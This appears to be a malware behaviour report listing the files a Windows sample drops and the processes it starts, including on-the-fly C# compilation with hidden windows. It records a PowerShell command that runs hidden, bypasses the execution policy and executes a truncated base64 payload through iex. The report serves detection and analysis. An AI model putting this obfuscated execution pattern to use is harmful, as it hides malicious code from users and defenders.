Technical Information
- %TEMP%\massindex.bat
- %HOMEPATH%\dwm.bat
- %TEMP%\nwjrqaiw.0.cs
- %TEMP%\nwjrqaiw.cmdline
- %TEMP%\nwjrqaiw.out
- %TEMP%\csc9e22.tmp
- %TEMP%\res9e42.tmp
- %TEMP%\nwjrqaiw.dll
- %TEMP%\res9e42.tmp
- %TEMP%\csc9e22.tmp
- %TEMP%\nwjrqaiw.out
- %TEMP%\nwjrqaiw.pdb
- %TEMP%\nwjrqaiw.0.cs
- %TEMP%\nwjrqaiw.dll
- %TEMP%\nwjrqaiw.cmdline
- '<SYSTEM32>\cmd.exe' /c %TEMP%\massIndex.bat
- '<SYSTEM32>\cmd.exe' /K "%TEMP%\massIndex.bat"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noprofile -windowstyle hidden -ep bypass -Command ""iex([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('CiRiaGRvaD0kZW52OlVTRVJOQU1FCiR5bmt2Yj0iQzpcVXNlcnNcJGJoZG9oXGR3bS5iYXQiCml...
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\nwjrqaiw.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES9E42.tmp" "%TEMP%\CSC9E22.tmp"
- '<SYSTEM32>\cmd.exe' /c %TEMP%\massIndex.bat' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\nwjrqaiw.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES9E42.tmp" "%TEMP%\CSC9E22.tmp"' (with hidden window)